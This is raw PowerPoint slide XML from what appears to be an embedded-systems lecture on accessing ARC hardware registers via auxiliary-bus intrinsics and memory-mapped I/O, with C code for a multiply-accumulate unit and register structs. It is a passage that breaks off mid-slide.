          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s9255"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32917172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pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Accessing registers – I/O bus (PMIO)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78851" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1752600"/>
            <a:ext cx="8229600" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>In ARC, an I/O bus exists, called the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>“auxiliary bus”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Registers on this bus are 32 bits wide, and have a 32 bits address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Special assembly commands are used to access auxiliary bus registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>LR (load register)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>SR (store register)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Register addresses are specified in the board specification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The C compiler supports two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>intrinsic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>unsigned _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>lr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> (unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>void _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>sr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> (unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3598854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990600" y="1676400"/>
            <a:ext cx="7162800" cy="4486275"/>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MAC_AUX_MLTR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0x100</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MAC_AUX_MLTD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0x101</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MAC_AUX_PROD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x102</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MAC_AUX_PROD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x103</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0x104</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 0x105</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0x106</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MAC_AUX_STAT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0x107</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" noProof="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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typedef struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> MacResult</a:t>
            </a:r>
          </a:p>
          <a:p>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UINT32 high;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	UINT32 medium;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	UINT32 low;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79878" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>MAC - code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2336902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609600" y="1752600"/>
            <a:ext cx="7848600" cy="4760913"/>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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> SigmaMult(</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a, </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b, </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n,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MacResult* res)</a:t>
            </a:r>
          </a:p>
          <a:p>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// clear the MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> result</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" noProof="1">
              <a:solidFill>
                <a:srgbClr val="008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_sr (0x2, MAC_AUX_STAT); </a:t>
            </a:r>
          </a:p>
          <a:p>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> i = 0; i &lt; n; ++i)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		_sr(a[i], MAC_AUX_MLTR);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		_sr(b[i], MAC_AUX_MLTD);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		_nop();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>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res-&gt;low    = _lr(MAC_AUX_RES</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res-&gt;medium = _lr(MAC_AUX_RES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="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res-&gt;high   = _lr(MAC_AUX_RES</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80903" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>MAC – code (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205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2050" name="Object 8"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7162800" y="2286000"/>
          <a:ext cx="1190625" cy="1143000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s10279" name="Equation" r:id="rId3" imgW="444307" imgH="431613" progId="Equation.3">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Equation" r:id="rId3" imgW="44430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0"/>
                        <a:ext cx="11906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58637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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>Accessing Registers - Memory Mapped I/O</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81923" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>MMIO means that the device is connected to the memory bus (rather that the auxiliary bus)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>The Memory Controller is responsible for decoding the address and directing it to the correct device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>The address mapping is defined in the board specification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Access to registers is through ST / LD assembly commands – in C this is done through pointers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="476987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smtClean="0"/>
              <a:t>MMIO example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19459" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="2133600"/>
            <a:ext cx="7848600" cy="3387725"/>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_MLTR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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000</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_MLTD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00100004</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_PROD</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00100008</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_PROD</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0010000C</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00100010</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00100014</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00100018</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_STAT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0010001C</a:t>
            </a:r>
          </a:p>
          <a:p>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status =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_STAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" noProof="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// clear the MAC result</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*status = 2; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8023447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smtClean="0"/>
              <a:t>Mapping registers to structs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83971" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MMIO allows creating a structure for the entire register space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then initialize a pointer to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> according to the device’s base address…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And access the registers through the fields of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>struct</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note the use of union and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bitfields</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="122533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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>Embedded Systems Development – Main Characteristics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85800" y="228600"/>
            <a:ext cx="7848600" cy="6418263"/>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prod_lo</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prod_hi</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res_lo</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res1_med</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res2_hi</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union</a:t>
            </a:r>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data</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valid    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 1;</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clear    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 1;</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reserved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 30;</a:t>
            </a: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 bits;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	} status;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*)(0x00100000);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mac-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stat.bits.clear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 1;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3149845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dirty="0" smtClean="0"/>
              <a:t>MMIO side effect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1752600"/>
            <a:ext cx="8229600" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Consider the following code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2362200"/>
            <a:ext cx="7848600" cy="1465263"/>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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wait_for_variable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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address)</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*)address;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-&gt;member == 0) ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
